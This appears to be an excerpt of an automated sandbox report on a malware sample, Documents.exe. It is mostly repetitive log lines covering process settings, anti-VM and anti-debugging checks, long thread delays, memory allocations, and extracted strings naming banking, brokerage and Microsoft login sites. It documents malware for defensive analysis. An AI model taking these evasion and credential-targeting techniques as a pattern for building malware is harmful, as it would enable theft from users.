                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: Documents.exe PID: 6392, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: uFEeKIucsX.exe PID: 1848, type: MEMORYSTR
                    Switches to a custom stack to bypass stack traces
                    Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                    Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
                    Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                    Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                    Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                    Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                    Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                    Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                    Source: C:\Users\user\Desktop\Documents.exeMemory allocated: 3100000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeMemory allocated: 3330000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeMemory allocated: 3150000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeMemory allocated: 9900000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeMemory allocated: 7AA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeMemory allocated: A900000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeMemory allocated: B900000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeMemory allocated: 2700000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeMemory allocated: 28A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeMemory allocated: 48A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeMemory allocated: 8B10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeMemory allocated: 9B10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeMemory allocated: 9D20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeMemory allocated: AD20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0152096E rdtsc 9_2_0152096E
                    Source: C:\Users\user\Desktop\Documents.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4843Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3992Jump to behavior
                    Source: C:\Windows\SysWOW64\systray.exeWindow / User API: threadDelayed 9833
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 0.7 %
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 0.2 %
                    Source: C:\Users\user\Desktop\Documents.exe TID: 5692Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3136Thread sleep count: 4843 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2804Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1248Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6532Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5248Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exe TID: 3652Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\systray.exe TID: 5160Thread sleep count: 139 > 30
                    Source: C:\Windows\SysWOW64\systray.exe TID: 5160Thread sleep time: -278000s >= -30000s
                    Source: C:\Windows\SysWOW64\systray.exe TID: 5160Thread sleep count: 9833 > 30
                    Source: C:\Windows\SysWOW64\systray.exe TID: 5160Thread sleep time: -19666000s >= -30000s
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe TID: 6512Thread sleep time: -65000s >= -30000s
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe TID: 6512Thread sleep count: 37 > 30
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe TID: 6512Thread sleep time: -55500s >= -30000s
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe TID: 6512Thread sleep count: 36 > 30
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe TID: 6512Thread sleep time: -36000s >= -30000s
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\systray.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\systray.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\Documents.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: H846yjBj.17.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                    Source: H846yjBj.17.drBinary or memory string: discord.comVMware20,11696428655f
                    Source: H846yjBj.17.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                    Source: H846yjBj.17.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                    Source: H846yjBj.17.drBinary or memory string: global block list test formVMware20,11696428655
                    Source: H846yjBj.17.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                    Source: H846yjBj.17.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                    Source: H846yjBj.17.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                    Source: H846yjBj.17.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                    Source: systray.exe, 00000011.00000002.4498880450.00000000006C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll+
                    Source: vWFGbvOdxI.exe, 00000012.00000002.4499410305.0000000000CAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
                    Source: H846yjBj.17.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                    Source: H846yjBj.17.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                    Source: H846yjBj.17.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                    Source: H846yjBj.17.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                    Source: H846yjBj.17.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                    Source: H846yjBj.17.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                    Source: H846yjBj.17.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                    Source: H846yjBj.17.drBinary or memory string: outlook.office.comVMware20,11696428655s
                    Source: firefox.exe, 00000014.00000002.2633826888.0000020F30C9C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllUU
                    Source: H846yjBj.17.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                    Source: H846yjBj.17.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                    Source: H846yjBj.17.drBinary or memory string: AMC password management pageVMware20,11696428655
                    Source: H846yjBj.17.drBinary or memory string: tasks.office.comVMware20,11696428655o
                    Source: H846yjBj.17.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                    Source: H846yjBj.17.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                    Source: H846yjBj.17.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                    Source: H846yjBj.17.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                    Source: H846yjBj.17.drBinary or memory string: dev.azure.comVMware20,11696428655j
                    Source: H846yjBj.17.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                    Source: H846yjBj.17.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                    Source: H846yjBj.17.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                    Source: H846yjBj.17.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                    Source: H846yjBj.17.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                    Source: C:\Users\user\Desktop\Documents.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\SysWOW64\systray.exeProcess queried: DebugPort
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0152096E rdtsc 9_2_0152096E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00417853 LdrLoadDll,9_2_00417853
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01578158 mov eax, dword ptr fs:[00000030h]9_2_01578158
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01574144 mov eax, dword ptr fs:[00000030h]9_2_01574144
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01574144 mov eax, dword ptr fs:[00000030h]9_2_01574144
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01574144 mov ecx, dword ptr fs:[00000030h]9_2_01574144
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01574144 mov eax, dword ptr fs:[00000030h]9_2_01574144
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01574144 mov eax, dword ptr fs:[00000030h]9_2_01574144
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E6154 mov eax, dword ptr fs:[00000030h]9_2_014E6154
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E6154 mov eax, dword ptr fs:[00000030h]9_2_014E6154
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014DC156 mov eax, dword ptr fs:[00000030h]9_2_014DC156
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158A118 mov ecx, dword ptr fs:[00000030h]9_2_0158A118
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158A118 mov eax, dword ptr fs:[00000030h]9_2_0158A118
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158A118 mov eax, dword ptr fs:[00000030h]9_2_0158A118
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158A118 mov eax, dword ptr fs:[00000030h]9_2_0158A118
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015A0115 mov eax, dword ptr fs:[00000030h]9_2_015A0115
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158E10E mov eax, dword ptr fs:[00000030h]9_2_0158E10E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158E10E mov ecx, dword ptr fs:[00000030h]9_2_0158E10E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158E10E mov eax, dword ptr fs:[00000030h]9_2_0158E10E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158E10E mov eax, dword ptr fs:[00000030h]9_2_0158E10E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158E10E mov ecx, dword ptr fs:[00000030h]9_2_0158E10E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158E10E mov eax, dword ptr fs:[00000030h]9_2_0158E10E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158E10E mov eax, dword ptr fs:[00000030h]9_2_0158E10E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158E10E mov ecx, dword ptr fs:[00000030h]9_2_0158E10E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158E10E mov eax, dword ptr fs:[00000030h]9_2_0158E10E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158E10E mov ecx, dword ptr fs:[00000030h]9_2_0158E10E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01510124 mov eax, dword ptr fs:[00000030h]9_2_01510124
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0155E1D0 mov eax, dword ptr fs:[00000030h]9_2_0155E1D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0155E1D0 mov eax, dword ptr fs:[00000030h]9_2_0155E1D0
